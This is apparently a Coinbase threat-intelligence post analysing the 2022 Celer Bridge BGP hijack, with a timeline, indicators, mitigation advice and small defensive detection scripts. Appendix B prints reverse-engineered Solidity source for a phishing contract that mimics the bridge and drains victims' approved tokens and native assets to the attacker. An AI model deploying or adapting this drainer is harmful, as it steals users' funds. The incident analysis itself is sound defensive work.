Tl;dr: In this piece we share critical lessons about the nature of the Celer Bridge compromise, attacker on-chain and off-chain techniques and tactics during the incident, as well as security tips for similar projects and users. Building a better crypto ecosystem means building a better, more equitable future for us all. That’s why we are investing in the larger community to make sure anyone who wants to participate in the cryptoeconomy can do so in a secure way.

While the Celer bridge compromise does not directly affect Coinbase, we strongly believe that attacks on any crypto business are bad for the industry as a whole and hope the information in the blog will help strengthen and inform similar projects and their users about threats and techniques used by malicious actors.

By: Peter Kacherginsky, Threat Intelligence









On August 17, 2022, Celer Network Bridge dapp users were targeted in a front-end hijacking attack which lasted approximately 3 hours and resulted in 32 impacted victims and $235,000 USD in losses. The attack was the result of a Border Gateway Protocol (BGP) announcement that appeared to originate from the QuickHostUk (AS-209243) hosting provider which itself may be a victim. BGP hijacking is a unique attack vector exploiting weakness and trust relationships in the Internet’s core routing architecture. It was used earlier this year to target other cryptocurrency projects such as KLAYswap.



Unlike the Nomad Bridge compromise on August 1, 2022, front-end hijacking primarily targeted users of the Celer platform dapp as opposed to the project’s liquidity pools. In this case, Celer UI users with assets on Ethereum, BSC, Polygon, Optimism, Fantom, Arbitrum, Avalanche, Metis, Astar, and Aurora networks were presented with specially crafted smart contracts designed to steal their funds.

Impact

Ethereum users suffered the largest monetary losses with a single victim losing $156K USD. The largest number of victims on a single network were using BSC, while users of other chains like Avalanche and Metis suffered no losses.

Compromise Analysis



The attacker performed initial preparation on August 12, 2022 by deploying a series of malicious smart contracts on Ethereum, Binance Smart Chain (BSC), Polygon, Optimism, Fantom, Arbitrum, Avalanche, Metis, Astar, and Aurora networks. Preparation for the BGP route hijacking took place on August 16, 2022. The attack itself began on August 17, 2022, when the attacker took over a subdomain responsible for serving dapp users with the latest bridge contract addresses, and lasted approximately 3 hours. The attack stopped shortly after the announcement by the Celer team, at which point the attacker started moving funds to Tornado Cash.

The following sections explore each of the attack stages in more detail as well as the Incident Timeline which follows the attacker over the 7 day period.

BGP Hijacking Analysis

The attack targeted the cbridge-prod2.celer.network subdomain which hosted critical smart contract configuration data for the Celer Bridge user interface (UI). Prior to the attack cbridge-prod2.celer.network (44.235.216.69) was served by AS-16509 (Amazon) with a 44.224.0.0/11 route.



On August 16, 2022 17:21:13 UTC, a malicious actor created routing registry entries for MAINT-QUICKHOSTUK and added a 44.235.216.0/24 route to the Internet Routing Registry (IRR) in preparation for the attack:

Figure 1 — Pre-attack router configuration (source: Misaka NRTM log by Siyuan Miao)



Starting on August 17, 2022 19:39:50 UTC a new route started propagating for the more specific 44.235.216.0/24 route with a different origin AS-14618 (Amazon) than before, and a new upstream AS-209243 (QuickHostUk):

Figure 2 — Malicious route announcement (source: RIPE Raw Data Archive)

Since 44.235.216.0/24 is a more specific route than 44.224.0.0/11, traffic destined for cbridge-prod2.celer.network started flowing through AS-209243 (QuickHostUk), which replaced key smart contract parameters as described in the Malicious Dapp Analysis section below.
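The preference for the more specific route can be illustrated with a minimal longest-prefix-match sketch. It uses only the two prefixes and the IP address quoted above; the route labels are shorthand for this example, not real router output, and actual BGP best-path selection involves more attributes than prefix length.

```python
import ipaddress

# Routes as described in the text: the pre-existing /11 and the hijacked /24.
# The labels are shorthand for this sketch only.
ROUTES = {
    ipaddress.ip_network("44.224.0.0/11"): "AS-16509 (Amazon)",
    ipaddress.ip_network("44.235.216.0/24"): "via AS-209243 (QuickHostUk)",
}


def best_route(address, routes):
    """Return the (network, label) pair with the longest matching prefix, or None."""
    ip = ipaddress.ip_address(address)
    matches = [(net, label) for net, label in routes.items() if ip in net]
    if not matches:
        return None
    # The most specific route is the one with the largest prefix length.
    return max(matches, key=lambda item: item[0].prefixlen)


# Routing table before the hijack: only the /11 exists.
before = {net: label for net, label in ROUTES.items() if net.prefixlen == 11}

print(best_route("44.235.216.69", before)[1])  # AS-16509 (Amazon)
print(best_route("44.235.216.69", ROUTES)[1])  # via AS-209243 (QuickHostUk)
```

Once the /24 is present, it wins for every address inside it, while the rest of the /11 keeps following the original route.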

Figure 3 — Network map after BGP hijacking (source: RIPE)



In order to intercept rerouted traffic, the attacker created a valid certificate for the target domain first observed at 2022–08–17 19:42 UTC using GoGetSSL, an SSL certificate provider based in Latvia. [1] [2]

Figure 4 — Malicious certificate (source: Censys)

Prior to the attack, Celer used SSL certificates issued by Let’s Encrypt and Amazon for its domains.
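A change of certificate issuer like this one is straightforward to flag automatically. The sketch below assumes certificate observations are already available as simple records; the record fields (`domain`, `issuer`) and the substring matching are assumptions of this example rather than the output format of any particular certificate search service.

```python
# Issuers the text says Celer used before the attack. Matching on lowercase
# substrings is an assumption of this sketch.
EXPECTED_ISSUERS = ("let's encrypt", "amazon")


def unexpected_certificates(records, expected=EXPECTED_ISSUERS):
    """Return the records whose issuer contains none of the expected issuer names."""
    flagged = []
    for record in records:
        issuer = record["issuer"].lower()
        if not any(name in issuer for name in expected):
            flagged.append(record)
    return flagged


# Hypothetical observations for the targeted subdomain.
observed = [
    {"domain": "cbridge-prod2.celer.network", "issuer": "Let's Encrypt"},
    {"domain": "cbridge-prod2.celer.network", "issuer": "Amazon"},
    {"domain": "cbridge-prod2.celer.network", "issuer": "GoGetSSL"},
]

for record in unexpected_certificates(observed):
    print("unexpected issuer:", record["issuer"])
```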



On August 17, 2022 at 22:12 UTC, the malicious route was withdrawn by multiple Autonomous Systems (ASes):

Figure 5 — Malicious route withdrawal (source: RIPE Raw Data Archive)



Shortly after, at 23:08:47 UTC, Amazon announced 44.235.216.0/24 to reclaim the hijacked traffic:

Figure 6 — Amazon claiming hijacked route (source: RIPE Raw Data Archive)

The first theft through a phishing contract occurred at 2022–08–17 19:51 UTC on the Fantom network, and thefts continued until 2022–08–17 21:49 UTC, when the last user lost assets on the BSC network. This aligns with the above timeline of changes to the project’s network infrastructure.



Malicious Dapp Analysis











The attack targeted a smart contract configuration resource hosted on cbridge-prod2.celer.network, such as https://cbridge-prod2.celer.network/v1/getTransferConfigsForAll, which holds per-chain bridge contract addresses. Modifying any of the bridge addresses would result in a victim approving and/or sending assets to a malicious contract. Below is a sample modified entry redirecting Ethereum users to a malicious contract, 0x2A2a…18E8.

Figure 7 — Sample Celer Bridge configuration (source: Coinbase TI analysis)

See Appendix A for a comprehensive listing of malicious contracts created by attackers.



















Phishing Contract Analysis







The phishing contract closely resembles the official Celer Bridge contract by mimicking many of its attributes. For any method not explicitly defined in the phishing contract, it implements a proxy structure which forwards calls to the legitimate Celer Bridge contract. The proxied contract is unique to each chain and is configured on initialization. The command below illustrates the contents of the storage slot responsible for the phishing contract’s proxy configuration:

Figure 8 — Phishing smart contract proxy storage (source: Coinbase TI analysis)
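For readers reproducing this check, an address stored on its own in a 32-byte storage slot occupies the low-order 20 bytes of the word, so decoding a raw slot value is a matter of slicing. The sketch below assumes the slot value has already been fetched as a hex string by whatever node tooling is available; the sample word is a made-up placeholder, not the real Celer Bridge address.

```python
def address_from_storage_word(word_hex):
    """Extract a 20-byte address from a 32-byte storage word given as hex."""
    digits = word_hex[2:] if word_hex.startswith("0x") else word_hex
    raw = bytes.fromhex(digits)
    if len(raw) != 32:
        raise ValueError("expected a 32-byte storage word")
    if any(raw[:12]):
        # Non-zero high bytes suggest the slot holds something other than a lone address.
        raise ValueError("upper 12 bytes are not zero")
    return "0x" + raw[12:].hex()


# Placeholder slot contents: 12 zero bytes followed by a dummy 20-byte address.
sample_word = "0x" + "00" * 12 + "11" * 20
print(address_from_storage_word(sample_word))
```

In the reverse engineered source in Appendix B, the proxied address is read with `sload(1)`, so slot 1 is the one to inspect.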



The phishing contract steals users’ funds using two approaches:

- Any tokens approved by phishing victims are drained using a custom method with the 4-byte selector 0x9c307de6.

- The phishing contract overrides the following methods to immediately steal a victim’s tokens:

  - send(): used to steal tokens (e.g. USDC)

  - sendNative(): used to steal native assets (e.g. ETH)

  - addLiquidity(): used to steal tokens (e.g. USDC)

  - addNativeLiquidity(): used to steal native assets (e.g. ETH)
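Calls to the custom drain method can be recognized from transaction input data alone, since the first four bytes of calldata carry the selector. The following sketch assumes the argument layout from the reverse engineered source in Appendix B (two address arguments, token first); the sample calldata uses dummy addresses.

```python
DRAIN_SELECTOR = "9c307de6"  # 4-byte selector quoted in the text


def decode_drain_call(tx_input_hex):
    """Return (token, victim) if the calldata invokes the drain method, else None.

    Assumes two ABI-encoded address arguments, as in the Appendix B source.
    """
    digits = tx_input_hex[2:] if tx_input_hex.startswith("0x") else tx_input_hex
    data = bytes.fromhex(digits)
    if data[:4].hex() != DRAIN_SELECTOR or len(data) < 4 + 64:
        return None
    # Each argument is a 32-byte word; an address sits in the last 20 bytes.
    token = "0x" + data[16:36].hex()
    victim = "0x" + data[48:68].hex()
    return token, victim


# Dummy calldata: selector, then a placeholder token and a placeholder victim.
sample_input = "0x9c307de6" + "00" * 12 + "aa" * 20 + "00" * 12 + "bb" * 20
print(decode_drain_call(sample_input))
```

The second argument is named `recipient` in Appendix B, but it is the account whose approved tokens are pulled, so it is labeled `victim` here.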

Below is a sample reverse engineered snippet which redirects assets to the attacker wallet:

Figure 9 — Phishing smart contract snippet (source: Coinbase TI analysis)

See Appendix B for the complete reverse engineered source code.
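The amount taken by the token-stealing path follows directly from the `steal` helper in Appendix B: it transfers the smaller of the victim's balance and the allowance granted to the phishing contract. A small model of that arithmetic, with illustrative numbers only:

```python
def drained_amount(balance, allowance):
    """Model of the steal() logic: take min(balance, allowance) when both are positive."""
    if balance > 0 and allowance > 0:
        return min(balance, allowance)
    return 0


UNLIMITED = 2**256 - 1  # the maximum uint256 value, commonly used for "unlimited" approvals

print(drained_amount(1_000, 250))        # 250: capped by the approval
print(drained_amount(1_000, UNLIMITED))  # 1000: the whole balance is exposed
print(drained_amount(1_000, 0))          # 0: nothing approved, nothing taken
```

This is why an unlimited approval to a phishing contract exposes the full token balance, while a revoked approval exposes nothing through this path.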











Swapping and Obfuscating Funds



During and immediately following the attack:

1. The attacker swapped stolen tokens on Curve, Uniswap, TraderJoe, AuroraSwap, and other chain-specific DEXs into each chain’s native assets or wrapped ETH.

2. The attacker bridged all assets from Step 1 to Ethereum.

3. The attacker then proceeded to swap the remaining tokens on Uniswap to ETH.

4. Finally, the attacker sent 127 ETH at 2022–08–17 22:33 UTC and another 1.4 ETH at 2022–08–18 01:01 UTC to Tornado Cash.

Following the steps outlined above, the attacker deposited the remaining 0.01201403570756 ETH to 0x6614…fcd9 which previously received funds from and fed into Binance through 0xd85f…4ed8.

The diagram below illustrates the multi-chain bridging and swapping flow used by the attacker prior to sending assets to Tornado Cash:

Figure 10 — Asset swapping and obfuscation diagram (source: Coinbase TI)

Interestingly, following the last theft transaction on 2022–08–17 21:49 UTC from a victim on BSC, there was another transfer on 2022–08–18 02:37 UTC by 0xe35c…aa9d on BSC more than 4 hours later. This address was funded minutes prior to this transaction by 0x975d…d94b using ChangeNow.

Attacker Profile

The attacker was well prepared and methodical in how they constructed phishing contracts. For each chain and deployment, the attacker painstakingly tested their contracts with previously transferred sample tokens. This allowed them to catch multiple deployment bugs prior to the attack.

The attacker was very familiar with available bridging protocols and DEXs, even on more esoteric chains like Aurora, as shown by how rapidly they swapped, bridged, and obfuscated stolen assets once the attack was discovered. Notably, the threat actor chose to target less popular chains like Metis, Astar, and Aurora while going to great lengths to send test funds through multiple bridges.

Transactions across chains and stages of the attack were serialized, indicating a single operator was likely behind the attack.

Performing a BGP hijacking attack requires a specialized networking skill set which the attacker may have deployed in the past.

Protecting Yourself



Web3 projects do not exist in a vacuum and still depend on traditional web2 infrastructure for many of their critical components, such as dapp hosting services, domain registrars, blockchain gateways, and the core Internet routing infrastructure. This dependency exposes otherwise decentralized products to more traditional threats such as BGP and DNS hijacking, domain registrar takeover, and traditional web exploitation. Below are several steps which may be used to mitigate threats in appropriate cases:

Enable the following security controls, or consider using hosting providers that have enabled them, to protect project infrastructure:

- RPKI to protect hosting routing infrastructure.

- DNSSEC and CAA to protect domain and certificate services.

- Multifactor authentication or enhanced account protection on hosting, domain registrar, and other services.

- Limit and restrict access to the above services, and log and review that access.
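To make the RPKI item concrete, here is a minimal sketch of route origin validation in the style of RFC 6811: an announcement is valid if some covering ROA matches its origin AS and permits its prefix length, invalid if it is covered but nothing matches, and not-found otherwise. The ROA entries below are hypothetical; the text does not state which ROAs actually existed for this prefix.

```python
import ipaddress


def validate_origin(prefix, origin_asn, roas):
    """Classify an announcement as 'valid', 'invalid', or 'not-found'.

    roas is an iterable of (prefix, max_length, asn) tuples.
    """
    announced = ipaddress.ip_network(prefix)
    covered = False
    for roa_prefix, max_length, roa_asn in roas:
        roa_net = ipaddress.ip_network(roa_prefix)
        # subnet_of() raises on mixed IP versions, so compare versions first.
        if announced.version != roa_net.version or not announced.subnet_of(roa_net):
            continue
        covered = True
        if announced.prefixlen <= max_length and origin_asn == roa_asn:
            return "valid"
    return "invalid" if covered else "not-found"


# Hypothetical ROA: only the /11 itself is authorized, and only from AS16509.
strict_roas = [("44.224.0.0/11", 11, 16509)]

print(validate_origin("44.224.0.0/11", 16509, strict_roas))    # valid
print(validate_origin("44.235.216.0/24", 14618, strict_roas))  # invalid
print(validate_origin("192.0.2.0/24", 64500, strict_roas))     # not-found
```

The outcome depends heavily on how ROAs are written. A ROA with a permissive maximum length, or one that authorizes the origin AS an attacker chooses to forge, would let a more specific announcement validate, so origin validation complements rather than replaces route monitoring.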







Implement the following monitoring both for the project and its dependencies:

- Implement BGP monitoring to detect unexpected changes to routes and prefixes (e.g. BGPAlerter)

- Implement DNS monitoring to detect unexpected record changes (e.g. DNSCheck)

- Implement certificate transparency log monitoring to detect unknown certificates associated with the project’s domain (e.g. Certstream)

- Implement dapp monitoring to detect unexpected smart contract addresses presented by the front-end architecture
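The dapp monitoring item can be approximated without knowing the exact configuration schema: walk whatever JSON the front-end serves, collect every address-like string, and compare the result with an allowlist of known-good addresses. In the sketch below the JSON field names and the allowlisted address are hypothetical; only the phishing address is taken from the Indicators section.

```python
import json
import re

ADDRESS_RE = re.compile(r"^0x[0-9a-fA-F]{40}$")


def find_addresses(node):
    """Yield every address-like string found anywhere in a decoded JSON value."""
    if isinstance(node, dict):
        for value in node.values():
            yield from find_addresses(value)
    elif isinstance(node, list):
        for item in node:
            yield from find_addresses(item)
    elif isinstance(node, str) and ADDRESS_RE.match(node):
        yield node.lower()


def unexpected_addresses(config_json, allowlist):
    """Return the sorted addresses present in the config but absent from the allowlist."""
    allowed = {address.lower() for address in allowlist}
    found = set(find_addresses(json.loads(config_json)))
    return sorted(found - allowed)


# Hypothetical allowlist entry and config layout, for illustration only.
KNOWN_GOOD = ["0x" + "11" * 20]
served_config = json.dumps({
    "chains": [
        {"id": 1, "contract_addr": "0x2A2aA50450811Ae589847D670cB913dF763318E8"},
        {"id": 56, "contract_addr": "0x" + "11" * 20},
    ]
})

print(unexpected_addresses(served_config, KNOWN_GOOD))
```

Comparing in lowercase avoids false alarms from checksum casing. A real configuration would likely also contain token addresses, which would need to be on the allowlist as well.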

DeFi users can protect themselves from front-end hijacking attacks by adopting the following practices:

- Verify smart contract addresses presented by a Dapp with the project’s official documentation when available.

- Exercise vigilance when signing or approving transactions.

- Use a hardware wallet or other cold storage solution to protect assets you don’t regularly use.

- Periodically review and revoke any contract approvals you don’t actively need.

- Follow the project’s social media feeds for any security announcements.

- Use wallet software capable of blocking malicious threats (e.g. Coinbase Wallet).

Coinbase is committed to improving our security and the wider industry’s security, as well as protecting our users. We believe that exploits like these can be mitigated and ultimately prevented. Besides making codebases open source for the public to review, we recommend frequent protocol audits, implementation of bug bounty programs, and partnering with security researchers. Although this exploit was a difficult learning experience for those affected, we believe that understanding how the exploit occurred can only help further mature our industry.

We understand that trust is built on dependable security, which is why we make protecting your account and your digital assets our number one priority.

Incident Timeline

Stage 1: Preparation

Funding

2022–08–12 14:33 UTC — 0xb0f5…30dd funded from Tornado Cash on Ethereum.

Bridging to BSC, Polygon, Optimism, Fantom, Arbitrum, and Avalanche

2022–08–12 14:41 UTC — 0xb0f5…30dd begins moving funds to BSC, Polygon, Optimism, Fantom, Arbitrum, and Avalanche using ChainHop on Ethereum.

BSC deployment

2022–08–12 14:56 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on BSC.

NOTE: Attacker forgot to specify Celer proxy contract.

2022–08–12 17:30 UTC — 0xb0f5…30dd deploys 0x5895…e7cf phishing contract on BSC and tests token retrieval.

Fantom deployment

2022–08–12 18:29 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Fantom.

NOTE: Attacker specified the wrong Celer proxy from the BSC network.

2022–08–12 18:30 UTC — 0xb0f5…30dd deploys 0x458f…f972 phishing contract on Fantom and tests token retrieval.

Bridging to Astar and Aurora

2022–08–12 18:36 UTC — 0xb0f5…30dd moves funds to Astar and Aurora using Celer Bridge on BSC.

Astar deployment

2022–08–12 18:41 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Astar.

Polygon deployment

2022–08–12 18:57 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Polygon.

Optimism deployment

2022–08–12 19:07 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Optimism and tests token retrieval.

Bridging to Metis

2022–08–12 19:12 UTC — 0xb0f5…30dd continues moving funds to Metis using Celer Bridge on Ethereum.

Arbitrum deployment

2022–08–12 19:20 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Arbitrum and tests token retrieval.

Metis deployment

2022–08–12 19:24 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Metis and tests token retrieval.

Avalanche deployment

2022–08–12 19:28 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Avalanche and tests token retrieval.

Aurora deployment

2022–08–12 19:40 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Aurora.

Ethereum deployment

2022–08–12 19:50 UTC — 0xb0f5…30dd deploys 0x2a2a…18e8 phishing contract on Ethereum and tests token retrieval.

Routing Infrastructure configuration

2022–08–16 17:21 UTC — Attacker updates IRR with AS209243, AS16509 members.

2022–08–16 17:36 UTC — Attacker updates IRR to handle 44.235.216.0/24 route.

Stage 2: Attack

2022–08–17 19:39 UTC — BGP Hijacking of 44.235.216.0/24 route.

2022–08–17 19:42 UTC — New SSL certificates observed for cbridge-prod2.celer.network [1] [2]

2022–08–17 19:51 UTC — First victim observed on Fantom.

2022–08–17 21:49 UTC — Last victim observed on BSC.

2022–08–17 21:56 UTC — Celer Twitter shares reports about a security incident.

2022–08–17 22:12 UTC — BGP Hijacking ends and 44.235.216.0/24 route withdrawn.

Stage 3: Post-Attack Swapping and Obfuscation

2022–08–17 22:33 UTC — Begin depositing 127 ETH to Tornado Cash on Ethereum.

2022–08–17 23:08 UTC — Amazon AS-16509 claims 44.235.216.0/24 route.

2022–08–17 23:45 UTC — The last bridging transaction to Ethereum from Optimism.

2022–08–17 23:48 UTC — The last bridging transaction to Ethereum from Polygon.

2022–08–17 23:53 UTC — The last bridging transaction to Ethereum from Arbitrum.

2022–08–18 00:01 UTC — The last bridging transaction to Ethereum from Avalanche.

2022–08–18 00:17 UTC — The last bridging transaction to Ethereum from Aurora.

2022–08–18 00:21 UTC — The last bridging transaction to Ethereum from Fantom.

2022–08–18 00:26 UTC — The last bridging transaction to Ethereum from BSC.

2022–08–18 01:01 UTC — Begin depositing 1.4 ETH to Tornado Cash on Ethereum.

2022–08–18 01:33 UTC — Transfer 0.01201403570756 ETH to 0x6614…fcd9.

Indicators

Ethereum: 0xb0f5fa0cd2726844526e3f70e76f54c6d91530dd

Ethereum: 0x2A2aA50450811Ae589847D670cB913dF763318E8

Ethereum: 0x66140a95d189846e74243a75b14fe6128dbbfcd9

BSC: 0x5895da888Cbf3656D8f51E5Df9FD26E8E131e7CF

Fantom: 0x458f4d7ef4fb1a0e56b36bf7a403df830cfdf972

Polygon: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Avalanche: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Arbitrum: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Astar: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Aurora: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Optimism: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Metis: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

AS: 209243 (AS number observed in the path on routing announcements and as a maintainer for the prefix in IRR changes)

Appendix A: Phishing smart contracts

Ethereum

0x2a2aa50450811ae589847d670cb913df763318e8

BSC

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

0x11f8c7cdf73b71cd189bb2a7f285dabfe8957f9c

0xc8dd7eadef50a659c480c6fa18863e354e12fc4f

0x5895da888cbf3656d8f51e5df9fd26e8e131e7cf

Polygon

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Fantom

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

0x458f4d7ef4fb1a0e56b36bf7a403df830cfdf972

Arbitrum

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Avalanche

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Astar

0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Aurora

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Metis

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Appendix B: Phishing smart contract source code (RE)

The following reverse engineered contract is based on the bytecode at 0x2a2a…18e8

```solidity
pragma solidity ^0.8.0;

import "./IERC20.sol";

contract CelerPhish {
    address attacker;    // storage slot 0
    address celerBridge; // storage slot 1, read by the fallback below

    constructor(address _celerBridge) {
        attacker = msg.sender;
        celerBridge = _celerBridge;
    }

    // Forwards any native assets sent with the call to the attacker
    function sendNative(address _receiver, uint256 _amount, uint64 _dstChainId, uint64 _nonce, uint32 _maxSlippage) public payable {
        require(msg.data.length - 4 >= 160);
        if (msg.value > 0) {
            (bool success, ) = attacker.call{value: msg.value}("");
            require(success);
        }
    }

    // Steals the caller's approved tokens
    function addLiquidity(address _token, uint256 _amount) public {
        steal(msg.sender, _token);
    }

    // Forwards any native assets sent with the call to the attacker
    function addNativeLiquidity(uint256 _amount) public payable {
        require(msg.data.length - 4 >= 32);
        if (msg.value > 0) {
            (bool success, ) = attacker.call{value: msg.value}("");
            require(success);
        }
    }

    // Steals approved funds, originally 0x9c307de6 4byte
    function stealApprovedTokens(address token, address recipient) public {
        require(msg.data.length - 4 >= 64);
        steal(recipient, token);
    }

    // Steals the caller's approved tokens
    function send(address _receiver, address _token, uint256 _amount, uint64 _dstChainId, uint64 _nonce, uint32 _maxSlippage) public {
        require(msg.data.length - 4 >= 192);
        steal(msg.sender, _token);
    }

    // Steals assets: transfers min(balance, allowance) from `recipient` to the attacker
    function steal(address recipient, address token) private {
        uint256 balance = IERC20(token).balanceOf(recipient);
        uint256 allowance = IERC20(token).allowance(recipient, address(this));
        if (balance > 0 && allowance > 0) {
            if (balance >= allowance) {
                bool success = IERC20(token).transferFrom(recipient, attacker, allowance);
                require(success);
            } else {
                bool success = IERC20(token).transferFrom(recipient, attacker, balance);
                require(success);
            }
        }
    }

    // Forward other calls to the Celer Bridge
    // EIP-1822: https://eips.ethereum.org/EIPS/eip-1822
    fallback() external payable {
        assembly { // solium-disable-line
            let contractLogic := sload(1)
            calldatacopy(0x0, 0x0, calldatasize())
            let success := delegatecall(sub(gas(), 10000), contractLogic, 0x0, calldatasize(), 0, 0)
            let retSz := returndatasize()
            returndatacopy(0, 0, retSz)
            switch success
            case 0 {
                revert(0, retSz)
            }
            default {
                return(0, retSz)
            }
        }
    }
}
```

References

- https://twitter.com/CelerNetwork/status/1560123830844411904

- https://slowmist.medium.com/truth-behind-the-celer-network-cbridge-cross-chain-bridge-incident-bgp-hijacking-52556227e940

- https://mailman.nanog.org/pipermail/nanog/2022-August/220320.html

- https://stat.ripe.net/app/use-cases/prefix/bgplay/S1_44.235.216.0%252F24_bgplay_TMAST1660694400000ET1660867200000

Celer Bridge incident analysis was originally published in The Coinbase Blog on Medium.